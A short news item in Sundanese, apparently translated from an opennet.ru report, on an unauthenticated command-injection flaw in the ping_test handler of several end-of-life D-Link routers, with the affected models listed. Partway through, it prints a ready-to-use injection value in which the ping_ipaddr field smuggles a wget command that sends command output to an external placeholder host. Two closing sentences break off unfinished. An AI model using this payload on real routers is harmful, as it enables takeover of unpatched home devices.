Dina router nirkabel D-Link
Narikna, numutkeun pamekar firmware, sauran "ping_test" kedah dilaksanakeun ngan ukur saatos auténtikasi, tapi dina kanyataanana disebut dina sagala hal, henteu paduli asup kana antarmuka wéb. Khususna, nalika ngaksés skrip apply_sec.cgi sareng ngalangkungan parameter "aksi = ping_test", naskah dialihkeun ka halaman auténtikasi, tapi dina waktos anu sami ngalaksanakeun tindakan anu aya hubunganana sareng ping_test. Pikeun ngaéksekusi kodeu, kerentanan sanésna dianggo dina ping_test sorangan, anu nyauran utilitas ping tanpa leres-leres mariksa kabeneran alamat IP anu dikirim pikeun diuji. Contona, pikeun nelepon utilitas wget sareng nransferkeun hasil paréntah "echo 1234" ka host éksternal, sebutkeun parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http: // test.test/?$( echo 1234)".
Ayana kerentanan parantos dikonfirmasi sacara resmi dina modél ieu:
- DIR-655 kalawan firmware 3.02b05 atawa heubeul;
- DIR-866L kalawan firmware 1.03b04 atawa heubeul;
- DIR-1565 kalawan firmware 1.01 atawa heubeul;
- DIR-652 (henteu aya inpormasi ngeunaan versi firmware anu bermasalah)
Mangsa pangrojong pikeun modél ieu parantos kadaluwarsa, janten D-Link
Ieu engké kapanggih yén kerentanan ogé
sumber: opennet.ru